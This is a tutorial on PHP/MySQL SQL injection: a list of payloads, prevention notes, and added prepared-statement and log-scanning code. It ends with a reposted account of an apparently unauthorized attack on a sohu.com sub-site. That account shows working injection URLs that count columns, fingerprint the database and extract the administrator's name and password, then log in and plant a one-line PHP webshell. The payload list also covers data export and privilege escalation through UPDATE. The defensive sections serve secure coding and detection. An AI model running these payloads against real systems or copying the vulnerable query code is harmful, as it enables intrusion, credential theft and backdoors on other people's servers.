Analysis of PHP SQL injection process

Source: Internet
Author: User
Tags: basic sql injection, mysql injection
Today I learned some basic SQL injection skills from the Internet. The focus of SQL injection is constructing SQL statements: only by using SQL statements flexibly can one construct effective injection strings. After completing the course I wrote these notes so they are ready for use at any time. I hope you have first read up on the basic principles of SQL. The code in the notes comes from the network.
=== Basic part ===
Single-table query:
http://127.0.0.1/injection/user.php?username=angel' and LENGTH(password)='6
http://127.0.0.1/injection/user.php?username=angel' and LEFT(password,1)='m
UNION statement:
http://127.0.0.1/injection/show.php?id=1' union select 1,username,password from user/*
http://127.0.0.1/injection/show.php?id=' union select 1,username,password from user/*
Export to a file:
http://127.0.0.1/injection/user.php?username=angel' into outfile 'c:/file.txt
http://127.0.0.1/injection/user.php?username=' or 1=1 into outfile 'c:/file.txt
http://127.0.0.1/injection/show.php?id=' union select 1,username,password from user into outfile 'c:/user.txt
INSERT statement:
INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', '$username', '$password', '$homepage', '1');
Construct the homepage value: http://4ngel.net', '3')#
The SQL statement becomes: INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', 'angel', 'mypass', 'http://4ngel.net', '3')#', '1');
UPDATE statement (my favourite):
First understand this SQL statement:
UPDATE user SET password='md5($password)', homepage='$homepage' WHERE id='$id'
If the SQL statement can be changed into any of the following forms, the injection succeeds.
1: Change the homepage value to
http://4ngel.net', userlevel='3
Then the SQL statement becomes
UPDATE user SET password='mypass', homepage='http://4ngel.net', userlevel='3' WHERE id='$id'
(userlevel is the user's privilege level.)
2: Change the password value to
mypass)' WHERE username='admin'#
Then the SQL statement becomes
UPDATE user SET password='md5(mypass)' WHERE username='admin'#)', homepage='$homepage' WHERE id='$id'
3: Change the id value to
' OR username='admin'
Then the SQL statement becomes
UPDATE user SET password='md5($password)', homepage='$homepage' WHERE id='' OR username='admin'
=== Advanced section ===
Common MySQL built-in functions
DATABASE()
USER()
SYSTEM_USER()
SESSION_USER()
CURRENT_USER()
VERSION()
SUBSTRING()
MID()
CHAR()
LOAD_FILE()
......
Function applications
UPDATE article SET title=DATABASE() WHERE id=1
http://127.0.0.1/injection/show.php?id=-1 union select 1,database(),version()
SELECT * FROM user WHERE username=char(97,110,103,101,108)
# char(97,110,103,101,108) is equivalent to 'angel' (decimal ASCII codes)
http://127.0.0.1/injection/user.php?userid=1 and password=char(109,121,112,97,115,115)
http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,1)>char(100)
http://127.0.0.1/injection/user.php?userid=1 and ord(mid(password,1,1))>111
Determine the number and type of fields in the table:
http://127.0.0.1/injection/show.php?id=-1 union select 1,1
http://127.0.0.1/injection/show.php?id=-1 union select char(97),char(97),char(97)
Guess the data table name:
http://127.0.0.1/injection/show.php?id=-1 union select 1,1 from members
Obtain the user name and password with a cross-table query:
http://127.0.0.1/ymdown/show.php?id=10000 union select 1,username,1,password,1 from ymdown_user where id=1
Others
# Verify the first character of the password
http://127.0.0.1/ymdown/show.php?id=10 union select 1 from ymdown_user where id=1 and ord(mid(password,1,1))=49
=== Injection prevention ===
Server
Set magic_quotes_gpc to On
Set display_errors to Off
Encoding
$keywords = addslashes($keywords);
$keywords = str_replace("_", "\_", $keywords);
$keywords = str_replace("%", "\%", $keywords);
Numeric type
Use intval() to cast the value before it reaches the query.
String type
Parameters in SQL statements must be enclosed in single quotation marks.
The following code is used to prevent injection.
if (get_magic_quotes_gpc()) {
    //....   (magic quotes have already escaped the input)
} else {
    $str = mysql_real_escape_string($str);
    $keywords = str_replace("_", "\_", $keywords);   // LIKE wildcard
    $keywords = str_replace("%", "\%", $keywords);   // LIKE wildcard
}
Useful functions
stripslashes()
get_magic_quotes_gpc()
mysql_real_escape_string()
strip_tags()
array_map()
addslashes()
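magic_quotes_gpc was removed in PHP 5.4 and the mysql_* functions in PHP 7, so the escaping approach above does not carry over to current PHP. As an added example that is not from the original notes, the UPDATE statement from the basic part is shown in its injectable string-building form and then rebuilt with a mysqli prepared statement; $db is assumed to be an open mysqli connection, and the user and article tables are the ones named in the notes.

```php
<?php
// Added example, not from the original notes. $db is assumed to be an open mysqli
// connection; table and column names follow the UPDATE statement in the basic part.

// VULNERABLE: values are spliced into the SQL text, so a homepage value of
//   http://4ngel.net', userlevel='3
// closes the quoted string and smuggles in an extra assignment (case 1 above).
function updateProfileUnsafe(mysqli $db, string $id, string $password, string $homepage): bool
{
    $sql = "UPDATE user SET password='" . md5($password) . "', homepage='" . $homepage
         . "' WHERE id='" . $id . "'";
    return (bool) $db->query($sql);
}

// HARDENED: the statement text is fixed when the server parses it; bound values can
// never become SQL, so the same homepage value is simply stored as a literal string.
function updateProfileSafe(mysqli $db, string $id, string $password, string $homepage): bool
{
    $stmt = $db->prepare('UPDATE user SET password = ?, homepage = ? WHERE id = ?');
    if ($stmt === false) {
        return false;
    }
    $hash = password_hash($password, PASSWORD_DEFAULT); // salted hash instead of bare md5(); column needs 60+ chars
    $idInt = (int) $id;                                  // the intval() rule for numeric input
    $stmt->bind_param('ssi', $hash, $homepage, $idInt);
    return $stmt->execute();
}

// The "_" and "%" replacements in the notes only matter inside a LIKE pattern. The
// placeholder already stops injection; escaping is still needed so a keyword such
// as "100%" matches literally, and ESCAPE tells MySQL which escape character is used.
function searchArticles(mysqli $db, string $keywords): array
{
    $escaped = str_replace(['!', '%', '_'], ['!!', '!%', '!_'], $keywords);
    $pattern = '%' . $escaped . '%';
    $stmt = $db->prepare("SELECT id, title FROM article WHERE title LIKE ? ESCAPE '!'");
    if ($stmt === false) {
        return [];
    }
    $stmt->bind_param('s', $pattern);
    $stmt->execute();
    return $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
}
```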
References:
http://www.4ngel.net/article/36.htm (SQL Injection with MySQL, Chinese)
http://www.phpe.net/mysql_manual/06-4.html (MySQL statement reference)
A security check on sohu.com
Published in Hacker Defense
Released at http://www.loveshell.net
Sohu.com is a large portal website in China that provides many services, including email. It is very difficult for such a large website to avoid any problems; as the saying goes, the more services, the less secure! This is true for both servers and websites. I had recently been learning about MySQL injection, so along the way I conducted a small security check on sohu.com to see whether any SQL injection vulnerability exists.
The main site of sohu.com turned out to be almost entirely static, so I gave up on finding a problem there. After browsing around the sohu.com sub-sites, I found that most use PHP scripts and a few use JSP. From experience, a PHP system generally has MySQL as its backend database, just as ASP usually pairs with MSSQL, so there might be plenty of problems. Because of a PHP feature (by default PHP escapes the ' and other characters in passed parameters, so character-type variables are hard to inject by default), we generally inject only numeric variables. From everyday injection knowledge, parameters passed in the form id=XXX are generally numeric variables, so we only need to test links of the form php?id=XXX to possibly find the vulnerability! After a careful search, I really did find a problematic link on XXX.it.sohu.com: http://XXX.it.sohu.com/book/serialize.php?id=86
Submit:
http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=1 /*
It returns normally (figure 1).
Then submit:
http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2 /*
No information is returned (figure 2): the page is empty because the result of the SQL statement is empty.
From these two URLs we can guess that the vulnerability exists, because the "and 1=1" and "and 1=2" we submitted were executed as part of the SQL statement! Other statements we submit can be executed too; this is SQL injection! We can also tell that the id variable is handled as a number and is not placed between quotes, otherwise this would not have succeeded! If the variable does not filter other SQL keywords, we are very likely to succeed! I have encountered many cases where select is filtered out of the variable, and with MySQL that is just a dead end. So depressing!
Since the vulnerability exists, let's continue! The first thing is to test the database version and the account used to connect to the database! With high permissions, and the database and the web server on the same machine, you can avoid the headache of guessing fields! Submit:
http://XXX.it.sohu.com/book/serialize.php?id=86 and ord(mid(version(),1,1))>51 /*
It returns normally (figure 3). This statement checks whether the database version is higher than 3, because the ASCII value of "3" is 51! If the first character of the version is greater than 51 it is of course 4.0 or above, and from 4.0 on union queries are supported. That saves one headache of guessing! The result here is true, so the database is 4.0 or above and union is supported.
Since union queries are supported, the first step is to expose the number of fields in this statement! Anything queried with union afterwards will be very fast! Submit:
http://XXX.it.sohu.com/book/serialize.php?id=86 order by 10 /*
The result returns normally (figure 4); it seems there are more than 10 fields. Submit again:
http://XXX.it.sohu.com/book/serialize.php?id=86 order by 20 /*
Normal return. Submit:
http://XXX.it.sohu.com/book/serialize.php?id=86 order by 30 /*
......
When order by 50 is reached no information is returned! So the count is greater than 40 and less than 50. Submit:
http://XXX.it.sohu.com/book/serialize.php?id=86 order by 45 /*
......
Finally I narrowed the field count down to around 41! Some fields cannot be sorted on, so union is still needed to pin the number of fields down precisely to 41. Submit:
http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,2,...,41 /*
The result returns (figure 5). Haha, success! Which fields are displayed on the page is now clear! Let's continue! Submit:
http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,user(),3,4,database(),6,7,8,9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 /*
The result returns (figure 6): the database system has been probed! We may not be root, and the database server and the web server may not be on the same machine, so we may not have the file privilege! Submit:
http://XXX.it.sohu.com/book/serialize.php?id=86 and (select count(*) from mysql.user)>0 /*
The result (figure 7) shows that we do not have permission to read mysql.user, which confirms that the account is not root! Haha!
Since it is not root, don't be discouraged; let's continue! We had better find the admin backend before guessing further data. In many cases we find the administrator password but cannot find a place to log in, which is very depressing! Appending /admin and /manage/, the common backend paths, under the root directory returned 404 errors; after a few more guesses I finally got a 403 Forbidden for admin under the /book/ directory. Haha, this directory exists! But the login page could not be guessed, which is depressing! Still, knowing there is an admin directory, we can search Google:
admin site:sohu.com
(figure 8). From another sub-site's forum we learn that people are lazy: the backend characteristics of one place are likely the characteristics of the whole site. So when I tried /book/admin/admuser.php, a miracle occurred (figure 9). Haha, we are closer to success! Now we know the site's backend. In fact this also gives very important information: the login form fields in the page source are named name and password, from which it is easy to deduce the structure of the other party's administrator table; even if it does not match exactly, it will be similar, haha! So now we know why we have to guess the backend first! Continue injecting! Submit:
http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,user(),3,4,database(),6,7,8,9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from admin /*
An error is returned, indicating that the admin table does not exist. Try admins, admin_user, and so on. Finally, submit:
http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,user(),3,4,database(),6,7,8,9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from user /*
Success, haha! There is a table named user! Is it the administrator table? What are its fields? Continue submitting:
http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from user /*
An error is returned (empty page). Submit:
http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,password,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from user /*
The result returns (figure 10). Haha, a password is returned normally; it should be the password of the first user in the administrator table! So what is his username? I guessed many field names and each returned an error; when there was no way left I entered id, and it returned success! id is the administrator's name! Submit:
http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,password,3,4,id,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from user /*
The result returns (figure 11). Haha, we have the administrator name! Excitedly I logged on to the backend with the administrator name and password (figure 12). Now it was time to think about how to get a webshell. I found a place in the backend to upload images, but when I uploaded a PHP file I was told it is not an image file; depressing! Rummaging through the backend, I found a function that generates a PHP file, so I inserted a one-line PHP webshell into it. Afterwards the system reported success, so it seems nothing is filtered there and we should have our webshell. The password is a, and the one-line backdoor connects (figure 14). Haha, success! The script test has been completed successfully!
After obtaining the webshell I looked around on the server and found that its security was good: commands could not be executed, and basically every directory except the one we had just uploaded to was not writable. Still, as a script test, the webshell was a success! We can also see that one small unfiltered parameter can lead to the fall of a website, especially for large sites such as sohu.com, which have many more parameters, so pay more attention to filtering!
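Seen from the defender's side, every step of the write-up above leaves a recognisable trace in the web server's access log. As an added example that is not part of the original article, the PHP script below scans constructed Apache combined-format log lines for those traces and groups the hits per client; the log lines, the IP addresses and the alert threshold are my own assumptions, not data from sohu.com.

```php
<?php
// Added example, not from the article. The log lines are constructed sample data;
// the request path only mirrors the write-up, and the threshold is an assumption.
const SIGNATURES = [
    'boolean probe (and 1=1 / and 1=2)' => '/\band\s+\d+\s*=\s*\d+/i',
    'column counting (order by N)'      => '/\border\s+by\s+\d+/i',
    'union select'                      => '/\bunion\s+(all\s+)?select\b/i',
    'fingerprint function'              => '/\b(version|user|database)\s*\(\s*\)/i',
    'char-by-char comparison'           => '/\bord\s*\(\s*mid\s*\(/i',
    'comment tail'                      => '~(/\*|--\s|#)\s*$~',
];
// Return the signature labels that match one request URL (decoded query string).
function classifyRequest(string $url): array
{
    $query = (string) parse_url($url, PHP_URL_QUERY);
    $decoded = urldecode(str_replace('+', ' ', $query));
    $hits = [];
    foreach (SIGNATURES as $label => $regex) {
        if (preg_match($regex, $decoded) === 1) {
            $hits[] = $label;
        }
    }
    return $hits;
}
// Scan combined-format lines and keep clients whose requests trip at least
// $minDistinct different signatures (a single hit alone is often a false positive).
function scanAccessLog(array $lines, int $minDistinct = 2): array
{
    $perClient = [];
    foreach ($lines as $line) {
        if (!preg_match('/^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP\/[\d.]+" (\d{3}) /', $line, $m)) {
            continue; // not a request line in the expected format
        }
        foreach (classifyRequest($m[2]) as $label) {
            $perClient[$m[1]][$label] = ($perClient[$m[1]][$label] ?? 0) + 1;
        }
    }
    return array_filter($perClient, fn(array $labels) => count($labels) >= $minDistinct);
}
// Constructed sample: one probing client (203.0.113.5) and one ordinary visitor.
$sampleLog = [
    '203.0.113.5 - - [10/Oct/2005:13:55:36 +0800] "GET /book/serialize.php?id=86%20and%201=1%20/* HTTP/1.1" 200 5123 "-" "Mozilla/4.0"',
    '203.0.113.5 - - [10/Oct/2005:13:55:40 +0800] "GET /book/serialize.php?id=86%20and%201=2%20/* HTTP/1.1" 200 812 "-" "Mozilla/4.0"',
    '203.0.113.5 - - [10/Oct/2005:13:56:02 +0800] "GET /book/serialize.php?id=86%20order%20by%2045%20/* HTTP/1.1" 200 5123 "-" "Mozilla/4.0"',
    '203.0.113.5 - - [10/Oct/2005:13:57:10 +0800] "GET /book/serialize.php?id=86%20and%201=2%20union%20select%201,user(),3%20/* HTTP/1.1" 200 5200 "-" "Mozilla/4.0"',
    '198.51.100.9 - - [10/Oct/2005:13:58:00 +0800] "GET /book/serialize.php?id=86 HTTP/1.1" 200 5123 "-" "Mozilla/4.0"',
];
foreach (scanAccessLog($sampleLog) as $client => $labels) {
    echo "$client: " . implode('; ', array_keys($labels)) . "\n";
}
```

The 1=1/1=2 pair also shows up as a large response-size swing (5123 vs 812 bytes here) from the same client on the same path, which is worth alerting on even when the keyword patterns are obfuscated.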